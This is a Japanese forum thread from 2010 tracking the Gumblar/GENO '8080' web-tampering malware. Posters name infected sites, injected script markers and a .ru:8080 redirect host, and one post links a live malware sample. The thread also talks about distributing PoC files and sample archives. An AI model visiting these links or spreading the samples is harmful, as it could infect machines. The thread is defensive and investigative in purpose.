 しかしネットサーフィンも電脳サバイバルの様相を呈してきた感じ・・・
865名無しさん@お腹いっぱい。:2010/01/09(土) 04:01:52
20XX年にはネットサーフィンをしていて脳を焼き切られたりする訳か。
866名無しさん@お腹いっぱい。:2010/01/09(土) 04:07:55
>>841
してるよ
867名無しさん@お腹いっぱい。:2010/01/09(土) 06:00:54
ノートソ警察w
tp://megalodon●jp/2010-0107-1225-07/ameblo●jp/caetla-2008/entry-10427328482●html
868名無しさん@お腹いっぱい。:2010/01/09(土) 06:42:22
>753
(4) JRE(Java Runtime Environment)を最新版に更新する

JRE入れてなかったら問題無い?
それともJRE入れて最新版にしとかないと駄目?
869名無しさん@お腹いっぱい。:2010/01/09(土) 06:44:05
いらないなら入れる必要はない
870名無しさん@お腹いっぱい。:2010/01/09(土) 06:49:17
個人PCに悪さしないならおとなしくAvast!のupdateまったほうがいいんではないかな
871名無しさん@お腹いっぱい。:2010/01/09(土) 06:58:22
ttp://bakera.jp/ebi/topic/4016
似通った文章にみえた
指南してる人いるのかな
872名無しさん@お腹いっぱい。:2010/01/09(土) 07:14:49
>>870
avast使ってる人はそれでも良いんじゃないか
みんなが使ってると思ってるのかな
873名無しさん@お腹いっぱい。:2010/01/09(土) 07:24:09
avast!タン ずっと一緒だお!
きゅいきゅい きゅいーん!
874名無しさん@お腹いっぱい。:2010/01/09(土) 07:29:24
もう馬鹿しか使ってない
875名無しさん@お腹いっぱい。:2010/01/09(土) 07:36:56
>>872
なんでもいいけどアンチウイルスのupdateをまてばいいのさ
876名無しさん@お腹いっぱい。:2010/01/09(土) 07:48:38
意味分からねえな
馬鹿havastのスレいけよ
877名無しさん@お腹いっぱい。:2010/01/09(土) 07:49:56
アンチウイルスの対応待つんじゃなくて
脆弱性の対処しとけば良いだけだ
avastなんかに期待するな
878名無しさん@お腹いっぱい。:2010/01/09(土) 07:56:01
>>849
検索窓のパーツに含まれてるJavaScriptファイルがやられてたので
設置してたサイトは改ざんサイト同然。

「ノートン警察」のブログパーツもJavaScriptファイルだから同じね。

>>744

>期間:2009年12月25日1時〜12月28日18時30分

改ざんファイルのタイムスタンプは 2009/12/24 1:30(GMT)周辺だったんだが、
どういう計算すると12月25日1時になるんだろ。

2009/12/26 2:47:54(GMT)に、検索窓のJavaScriptファイルだけ直したみたい。
ほかの奴のは29日夕方だけど、28日18時30分に閉鎖したってことかな
879名無しさん@お腹いっぱい。:2010/01/09(土) 09:16:47
http://www.note-pc.biz/
このページ改竄されてね?js検知すんぞ
880名無しさん@お腹いっぱい。:2010/01/09(土) 09:28:19
>>879
ttp://www●note-pc●biz/js/rollover●js
rollover.jsにぐぬーたんがいるおっおww
881sage ◆sage/xLnlI :2010/01/09(土) 09:37:40
おっっっっっっっっっっっっっっっっっっっっっっっっはっっっっっっっっっっっっっっっっっっっっっっっっっっっようごっごっごごごごごございまkっさ
882名無しさん@お腹いっぱい。:2010/01/09(土) 09:44:13
>>880
aguseのカスペが反応しないんだが新種かねぇ?
883sage ◆sage/xLnlI :2010/01/09(土) 09:45:20
http://www16●atpages.jp/filedl/ds%20psp%20syosinsyakouza.html
884sage ◆sage/xLnlI :2010/01/09(土) 09:46:02
>>883
検体です
(踏んだら危険)
885名無しさん@お腹いっぱい。:2010/01/09(土) 09:50:52
886名無しさん@お腹いっぱい。:2010/01/09(土) 09:53:04
ClamAVに検体送っといたお
887名無しさん@お腹いっぱい。:2010/01/09(土) 09:55:41
>>885
テンキュー
888sage ◆sage/xLnlI :2010/01/09(土) 10:02:17
>>883に付け加え

コード

書いてある
だけ
です
889名無しさん@お腹いっぱい。:2010/01/09(土) 10:15:30
>>879を踏んでみた→Adobe ReaderとJavaが起動したが結局何も起こらず
両者とも最新版だお
890名無しさん@お腹いっぱい。:2010/01/09(土) 10:17:31
ニフティのオンラインスキャンやっても
3万ファイルぐらいでスキャン終了されて
system32のログとかローカルの中のtmpとかロック扱いで中身見てもらえないんだが
これ本当に大丈夫なんだろうか

マカフィーは今日手動更新してもファイル更新できないし
FTP使った後、一時間以上サイト改ざんされなければもう白でいいのか?
891名無しさん@お腹いっぱい。:2010/01/09(土) 10:33:21
>>889
>踏んでみた→Adobe ReaderとJavaが起動
これアウトじゃね?
pdf開いてないのにReaderは普通起動しないだろ…
892名無しさん@お腹いっぱい。:2010/01/09(土) 10:38:02
>>891
ttp://www.keiyu.com/doc/pdflink.htm
embedでPDFを埋め込めるお
893名無しさん@お腹いっぱい。:2010/01/09(土) 10:41:09
/*------------------------------------------------------------
* ロールオーバーを設定する画像にクラス名「over」を指定
* ロールオーバー時に表示するための画像ファイル名後ろに「_over」をつける
/*------------------------------------------------------------*/

894名無しさん@お腹いっぱい。:2010/01/09(土) 10:44:13
しかも今回の攻撃は最新版のAdobe Readerがまだ修正してない脆弱性を使うようなんだが…
仮想環境でもないWindowsであんまりチャレンジしない方がいいぞ
895名無しさん@お腹いっぱい。:2010/01/09(土) 10:58:13
その落ちてくるPDFってのをくれ
scriptが埋め込むURLにアクセスしても0byteが帰ってくるだけで
何も落ちてこない。
windows使ってないから?リファラ見てる?
896名無しさん@お腹いっぱい。:2010/01/09(土) 11:01:14
今回悪用されていると思われる脆弱性のPoC拾ってきたお
悪質なコードを取り除きPDFを作成次第配布するお
897名無しさん@お腹いっぱい。:2010/01/09(土) 11:04:08
>>889
ReaderはバージョンだけじゃなくJavaScript機能オフまでが対策

>>890
1時間程度じゃ改ざんされない可能性もある
心配ならOS入れなおせよ
898名無しさん@お腹いっぱい。:2010/01/09(土) 11:05:20
>>895
リファラも見てるかもしれんが
少なくともUserAgentは見てるんじゃね
899名無しさん@お腹いっぱい。:2010/01/09(土) 11:09:21
>>895
>>896のようにPoCをちょっといじったものなら別スレで喜んで張ってた奴がいる
avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/

wgetで普通に取れる ただこれは今回実際に攻撃に使われてるものではない
900名無しさん@お腹いっぱい。:2010/01/09(土) 11:10:07
>>889
> Adobe ReaderとJavaが起動したが結局何も起こらず
何も起きてないことをどうやって確認したんだ?
901名無しさん@お腹いっぱい。:2010/01/09(土) 11:12:10
>>900
ファイル操作系のAPIを全てフックして監視していたお
念のためにディスクイメージも比較した
結論:特に変化無し
902名無しさん@お腹いっぱい。:2010/01/09(土) 11:13:03
>>889は、まだトロイ本体が侵入して無いだけの状態かな?

903名無しさん@お腹いっぱい。:2010/01/09(土) 11:14:28
>>901
APIフックって自作?
何かツールあるの?
904名無しさん@お腹いっぱい。:2010/01/09(土) 11:15:54
企業が結構やられてるから個人のサイトなんかもう恐くて見れないな
2ちゃんがやられる可能性もあるの?
905名無しさん@お腹いっぱい。:2010/01/09(土) 11:16:01
>>903
自作だお
既製品はシラネ
906名無しさん@お腹いっぱい。:2010/01/09(土) 11:18:24
時間経過で変化出るのかな
907名無しさん@お腹いっぱい。:2010/01/09(土) 11:19:05
>>905
俺に作り方教えてくれ
908名無しさん@お腹いっぱい。:2010/01/09(土) 11:24:54
>>907
言語は?
909名無しさん@お腹いっぱい。:2010/01/09(土) 11:26:26
>>901
砂箱つかえよ
Sandboxieとか
910名無しさん@お腹いっぱい。:2010/01/09(土) 11:29:28
>>908
一応Cできる。カーネルの知識はない。
911名無しさん@お腹いっぱい。:2010/01/09(土) 11:30:23
>>910
要するにファイル操作系のAPIを全てフックして監視すればいいんじゃね?
912名無しさん@お腹いっぱい。:2010/01/09(土) 11:49:27
>>901
古いreaderとか入れろよ
913名無しさん@お腹いっぱい。:2010/01/09(土) 11:59:33
>>879
パソコンお直し隊 電話番号
http://www.google.co.jp/search?hl=ja&source=hp&q=%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%81%8A%E7%9B%B4%E3%81%97%E9%9A%8A+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&lr=&rlz=1R2ADBR_ja&aq=5mr&oq=%E3%81%8A%E3%81%AA%E3%81%8A%E3%81%97%E3%81%9F%E3%81%84
2010-1-9(土)11:46電凸
中国人?が出る
よく分からんが、むかついたので完了とする
これ以降は、恣意的にウイルスを拡散しているものと判断
914名無しさん@お腹いっぱい。:2010/01/09(土) 12:11:37
>>811
凸電した
お宅のHPをみたらPCぶっ壊れたと言ってやった
915名無しさん@お腹いっぱい。:2010/01/09(土) 12:40:52
>>879
HEUR:Exploit.Script.Generic

カスペルスキー
ジェネリックで検知
916名無しさん@お腹いっぱい。:2010/01/09(土) 13:08:28
http://www.note-pc.biz/
ここはもう何も落としてこないな
単にアンチウィルスが反応するだけで、pdfも送り返して来ない
917名無しさん@お腹いっぱい。:2010/01/09(土) 13:31:33
ru:8080側でアクセス制御していて2度目以降は404を装うと何度言ったら…。
IP変えて(串可)どうぞ。
918名無しさん@お腹いっぱい。:2010/01/09(土) 13:33:34
アンチウイルスが反応するリンクをそのまま張るな
919名無しさん@お腹いっぱい。:2010/01/09(土) 13:39:48
>>912
それは軽く死ねる
920名無しさん@お腹いっぱい。:2010/01/09(土) 13:58:01
またAviraは誤検出か
いい加減にしとけや
921名無しさん@お腹いっぱい。:2010/01/09(土) 14:56:04
ファイル操作系だけじゃなくてプロセス生成とかネットワークを監視しなくていいのか?
というか監視は普通にProcess Monitorとかでできるんじゃないか
922名無しさん@お腹いっぱい。:2010/01/09(土) 15:02:50
高木浩光さんコメントお願いします
923名無しさん@お腹いっぱい。:2010/01/09(土) 15:04:43
高木はNyzillaで忙しい
924名無しさん@お腹いっぱい。:2010/01/09(土) 15:45:45
>>921
それだと表示されない関数があるお
Wiresharkと適当な実装のAPIフックプログラムを併用しているお

何故かVistaでフック出来ない件
教えてエロい人
925名無しさん@お腹いっぱい。:2010/01/09(土) 15:47:44
ム板行け
926名無しさん@お腹いっぱい。:2010/01/09(土) 15:52:22
語尾の「〜お」がキモい
死ね
927名無しさん@お腹いっぱい。:2010/01/09(土) 15:57:02
はいはいVipper乙
928名無しさん@お腹いっぱい。:2010/01/09(土) 16:01:22
おちつけお( ^ω^)
929名無しさん@お腹いっぱい。:2010/01/09(土) 16:06:39
(゚ω゚)VIPお断りします
930名無しさん@お腹いっぱい。:2010/01/09(土) 16:10:57
(´・ω・) カワイソス
931名無しさん@お腹いっぱい。:2010/01/09(土) 16:13:57
>>924
プラグインの起動まではしているがその後こけてるということか
具体的にどういうコードが動いてるかは見てる?
932名無しさん@お腹いっぱい。:2010/01/09(土) 16:22:30
セキュ板はNoノートンだおだお
933名無しさん@お腹いっぱい。:2010/01/09(土) 18:57:52
このメールは全ご登録ユーザー様、
および製品情報サービスを申し込まれた方にお送りしております。

「Gumblar(ガンブラー)」関連ウイルスにご注意ください

                              ソースネクスト株式会社

いつもソースネクスト製品をご愛用いただき、誠にありがとうございます。
さて、現在、改ざんされたサイトを閲覧しただけで感染する「Gumblar(ガンブラー)」と
その亜種が流行しています。念のため、利用されているウイルス対策ソフトの対応状況を
確認されることをおすすめいたします。

なお、ソースネクストの「ウイルスセキュリティ」は、これらのウイルスに対応済みですので、
必要な方はこの機会にご検討ください。

  セキュリティ製品のお客様専用サイト
  http://mail.sourcenext.info/c/arzdfpimb1tdwKab

  「ウイルスセキュリティ」のお買い求めはこちら
  eSHOP価格4,480円 (標準価格 4,980円) 10%OFF
  http://mail.sourcenext.info/c/arzdfpimb1tdwKac

今後ともソースネクスト製品を末永くお使いいただきますようお願い申し上げます
934名無しさん@お腹いっぱい。:2010/01/09(土) 19:06:49
だが! 断る!!
935名無しさん@お腹いっぱい。:2010/01/09(土) 19:07:25
>>932
バスターでサクサク快適アルヨー
936名無しさん@お腹いっぱい。:2010/01/09(土) 19:33:26
ClamAVニダ
937名無しさん@お腹いっぱい。:2010/01/09(土) 20:01:59
>>616
FTP通信そのものを見てるとしたら繋いだFTP鯖だけだよね
繋いでないのに改竄されてる・一つ繋いだら他のFTP鯖のサイトも改竄されたと言ってる人はどうなるの?

繋いだのに忘れてるのかな?
938名無しさん@お腹いっぱい。:2010/01/09(土) 20:03:17
>>937
FTPクライアントにパスが保存してあるって
それを読み取られてるんじゃね?
939名無しさん@お腹いっぱい。:2010/01/09(土) 20:03:58
嗚呼w日本語がw
940名無しさん@お腹いっぱい。:2010/01/09(土) 20:21:57
JAVAとJavascriptオフにしてたら感染しない?
941名無しさん@お腹いっぱい。:2010/01/09(土) 20:23:26
>>937
genoを解析したところによると一部のFTPクライアントの設定を読み取って改ざんするとなってた。
942名無しさん@お腹いっぱい。:2010/01/09(土) 20:31:27
スレの内容も堂々巡りだなw
943名無しさん@お腹いっぱい。:2010/01/09(土) 20:55:44
>>941
Genoとは別物だけどね
FTPクライアントの設定ファイルは見てるのは事実
944名無しさん@お腹いっぱい。:2010/01/09(土) 20:59:43
【Geno】 ガンブラーウィルス  ヤフーも被害に  昨年10月27日〜今年1月8日
http://tsushima.2ch.net/test/read.cgi/news/1263036497/
945名無しさん@お腹いっぱい。:2010/01/09(土) 21:04:37
こう頻繁に見つかると企業の極秘情報も中国に売られてるんじゃない?
946名無しさん@お腹いっぱい。:2010/01/09(土) 22:01:39
avast! が LGPL のスクリプトに対応した
JS:Illredir-C [Trj]
947名無しさん@お腹いっぱい。:2010/01/09(土) 22:32:53
948名無しさん@お腹いっぱい。:2010/01/09(土) 22:46:59
こっちのLGPLはもっと少ないな
新たにavastが加わったくらいだ
結果: 6/41 (14.64%)
http://www.virustotal.com/jp/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674
949名無しさん@お腹いっぱい。:2010/01/09(土) 22:52:18
カーチャンのPCが物凄いアクセスしてくる
950名無しさん@お腹いっぱい。:2010/01/09(土) 22:54:15
カーチャンが必死なんだろ
951名無しさん@お腹いっぱい。:2010/01/09(土) 23:41:12
カーチャンがんがれ!
952名無しさん@お腹いっぱい。:2010/01/09(土) 23:42:47
>>948
100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
953名無しさん@お腹いっぱい。:2010/01/09(土) 23:48:08
馬鹿には(´・ω・) スnスn出来ない(´・ω・) スクリプト
ttp://2sen.dip.jp/cgi-bin/upgun/up1/source/up36231.htm
954名無しさん@お腹いっぱい。:2010/01/09(土) 23:55:24
権限なしのなら大丈夫?
955名無しさん@お腹いっぱい。:2010/01/09(土) 23:57:23
>>953
これはなんだ?
NoScript入れてたからどうもないと思うが
956名無しさん@お腹いっぱい。:2010/01/10(日) 00:00:12
Security Tool はGumblarみたいにFTP情報流したりしないの?
957名無しさん@お腹いっぱい。:2010/01/10(日) 00:08:33
>>953
NoScript解いたけどどうもならないな・・・
958名無しさん@お腹いっぱい。:2010/01/10(日) 00:27:12

http://www29.atwiki.jp/geno/
の管理人だけど、更新したほうがいい?

正直今頃になって大騒ぎするとは思わなかったわ
959名無しさん@お腹いっぱい。:2010/01/10(日) 00:31:18
>>958
更新してくれるとありがたい
960名無しさん@お腹いっぱい。:2010/01/10(日) 00:31:43
>>958
当たり前だろ。出来ないんだったら
古い情報垂れ流して混乱招くからサイトごと消せ
961名無しさん@お腹いっぱい。:2010/01/10(日) 00:33:33
>>958
8080系がそのGENOウイルスと一緒だと思ってて
そこに書いてある対策とか薦めてる人が結構いるから
せめて注意書きくらいはしといた方がいいんじゃない?
962名無しさん@お腹いっぱい。:2010/01/10(日) 00:39:06
>>958
感染の確認方法と復帰方法は違う種類なので役に立たないと
いうのは書いておいた方がいいかも
963名無しさん@お腹いっぱい。:2010/01/10(日) 00:42:23
ブロック推奨うrl
http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/

糞長すぎ乙
964958:2010/01/10(日) 00:52:25
とりあえずほぼ全ページに警告入れてみた。

http://www29.atwiki.jp/geno/pages/19.html
これは今も有効な対策?
965名無しさん@お腹いっぱい。:2010/01/10(日) 00:54:02
>963
8080以下は何種類からかランダムで決まるから意味なし乙
それなら.ru:8080/をブロックする方がマシ
966名無しさん@お腹いっぱい。:2010/01/10(日) 00:55:06
>>964
うん
967名無しさん@お腹いっぱい。:2010/01/10(日) 00:57:15
>>964
とっても乙
968名無しさん@お腹いっぱい。:2010/01/10(日) 01:11:09
感染したサイト
↓リダイレクト
http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
↓リダイレクト
http://baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/index●php?ys
↓/pics/jquery.jx→eval("Aapdk2='M';");
現在人力デコードなう ←今ココ
969名無しさん@お腹いっぱい。:2010/01/10(日) 01:24:10
>>963
これは何なの?
970名無しさん@お腹いっぱい。:2010/01/10(日) 01:26:12
>>969
ガンプラの親玉
971名無しさん@お腹いっぱい。:2010/01/10(日) 01:27:47
>>964
超乙
それはいまも必要な情報でございます
972名無しさん@お腹いっぱい。:2010/01/10(日) 01:31:32
そろそろまずいので次スレ立ててくる
973972:2010/01/10(日) 01:35:01
ERROR!
ERROR:新このホストでは、しばらくスレッドが立てられません。
またの機会にどうぞ。。。

orz
ダメだったのでテンプレ貼り

【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
974名無しさん@お腹いっぱい。:2010/01/10(日) 01:37:07
>>973
逝ってみる。
2以降はよろ。
975名無しさん@お腹いっぱい。:2010/01/10(日) 01:38:37
>>973
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
976名無しさん@お腹いっぱい。:2010/01/10(日) 01:41:23
>>975
977名無しさん@お腹いっぱい。:2010/01/10(日) 01:42:11
>>975
おつなんだから
978名無しさん@お腹いっぱい。:2010/01/10(日) 01:42:52
>>974

貼っておきました
979名無しさん@お腹いっぱい。:2010/01/10(日) 01:43:55
>>978
乙でした。
980名無しさん@お腹いっぱい。:2010/01/10(日) 01:44:44
8080関連の検体詰め合わせってうpっても大丈夫なのか?
981名無しさん@お腹いっぱい。:2010/01/10(日) 01:46:22
ほい

【鑑定目的禁止】検出可否報告スレ13
http://pc11.2ch.net/test/read.cgi/sec/1258817697/
982名無しさん@お腹いっぱい。:2010/01/10(日) 01:48:22
>>980
検出可否報告スレにならロダもあるし提出もしてくれそうで一石二鳥
解凍パスワードを"infected"か "virus"にしてうp
983名無しさん@お腹いっぱい。:2010/01/10(日) 01:53:14
ほな 1000とっとくわな

【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
984名無しさん@お腹いっぱい。:2010/01/10(日) 01:54:40
レッドカード出ますたw
985名無しさん@お腹いっぱい。:2010/01/10(日) 02:00:29
ここ「ガンブラー」に感染したのか?
http://www.mag-x.com/blog/index.html
986名無しさん@お腹いっぱい。:2010/01/10(日) 02:05:28
>>985
ttp://www●mag-x●com/blog/cat16/
/*LGPL*/
987名無しさん@お腹いっぱい。:2010/01/10(日) 02:05:45
Bingのキャッシュに/*GNU GPL*/
988名無しさん@お腹いっぱい。:2010/01/10(日) 02:06:18
ほかもやられてるお。。。
989名無しさん@お腹いっぱい。:2010/01/10(日) 02:09:04
凄いな・・・
990名無しさん@お腹いっぱい。:2010/01/10(日) 02:12:58
>>985
実施中の緊急メンテナンス終了予定のお知らせ

対応早いね
991名無しさん@お腹いっぱい。:2010/01/10(日) 02:16:09
>>990
他のページが放置っぽい。。。
992名無しさん@お腹いっぱい。:2010/01/10(日) 02:17:10
対応早いとこはだいたいわかってないからな
再発する
993名無しさん@お腹いっぱい。:2010/01/10(日) 02:20:34
http://www●mag-x●com/にアクセスするとメンテナンスページに飛ばされるけど
リダイレクトが2回あって1回目でG dataが反応する
994名無しさん@お腹いっぱい。:2010/01/10(日) 02:22:54
>993

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
2:21:57
Kaspersky Internet Security 2010
995名無しさん@お腹いっぱい。:2010/01/10(日) 02:36:34
>>985
これ一ブログじゃなくて収容してるブログ全体にウイルスコード入れられたのか
996名無しさん@お腹いっぱい。:2010/01/10(日) 02:37:14
ikhvyhbl;lknouvb;jnl/ nu:;lj/.kl\;N*M*

なんだこれ新型か?
997名無しさん@お腹いっぱい。:2010/01/10(日) 02:37:38
>>993
ほんとだ

http://www●mag-x●com/ ←302だけどボディに/*LGPL*/

http://www●mag-x●com/pc●html

http://www●mag-x●com/blog/index●html
998名無しさん@お腹いっぱい。:2010/01/10(日) 02:40:30
999名無しさん@お腹いっぱい。:2010/01/10(日) 02:42:04
>>998
うはw収容サイトにもれなく入ってる
1000名無しさん@お腹いっぱい。:2010/01/10(日) 02:42:26
1000なら癌ブラーは無くなる
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。